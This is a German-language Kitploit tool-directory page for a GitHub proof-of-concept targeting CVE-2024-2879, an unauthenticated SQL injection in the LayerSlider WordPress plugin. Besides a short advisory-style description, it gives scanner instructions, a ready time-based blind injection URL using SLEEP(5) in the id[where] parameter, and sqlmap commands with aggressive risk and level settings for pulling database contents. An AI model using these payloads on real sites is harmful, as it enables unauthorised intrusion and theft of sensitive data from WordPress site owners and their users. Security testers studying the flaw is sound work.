Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-2879 — Proof-of-Concept-Exploit für CVE-2024-2879: nicht authentifizierte SQL-Injection im LayerSlider-WordPress-Plugin (7.9.11–7.10.0). Enthält Scanner-Skript und SQLMap-Exploitation-Anleitung zum Extrahieren von Datenbankinformationen. | Kitploit
Tools/GitHubGitHub/herculeszxc/cve-2024-2879
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubherculeszxc/cve-2024-2879

CVE-2024-2879

Proof-of-Concept-Exploit für CVE-2024-2879: nicht authentifizierte SQL-Injection im LayerSlider-WordPress-Plugin (7.9.11–7.10.0). Enthält Scanner-Skript und SQLMap-Exploitation-Anleitung zum Extrahieren von Datenbankinformationen.

Repository anzeigen
2231vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-2879

Beschreibung

LayerSlider 7.9.11 - 7.10.0 - Unauthentifizierte SQL-Injection

Das LayerSlider-Plugin für WordPress ist anfällig für SQL-Injection über die Aktion ls_get_popup_markup in den Versionen 7.9.11 und 7.10.0 aufgrund unzureichender Maskierung des benutzergesteuerten Parameters und fehlender ausreichender Vorbereitung der bestehenden SQL-Abfrage. Dies ermöglicht es nicht authentifizierten Angreifern, zusätzliche SQL-Abfragen in bereits bestehende Abfragen einzufügen, die zum Extrahieren sensibler Informationen aus der Datenbank verwendet werden können.

Verwendung des Scanners

  1. Installiere Abhängigkeiten: pip install -r requirements.txt
  2. python3 scan.py oder <urllist.txt> image

Manuelle Überprüfung, ob die Website nicht durch WAF geschützt ist

"http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq" 5 Sekunden Verzögerungsantwortzeit

image

SQL Map Ausnutzung

sqlmap "https:://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T oder sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T

Tool herunterladen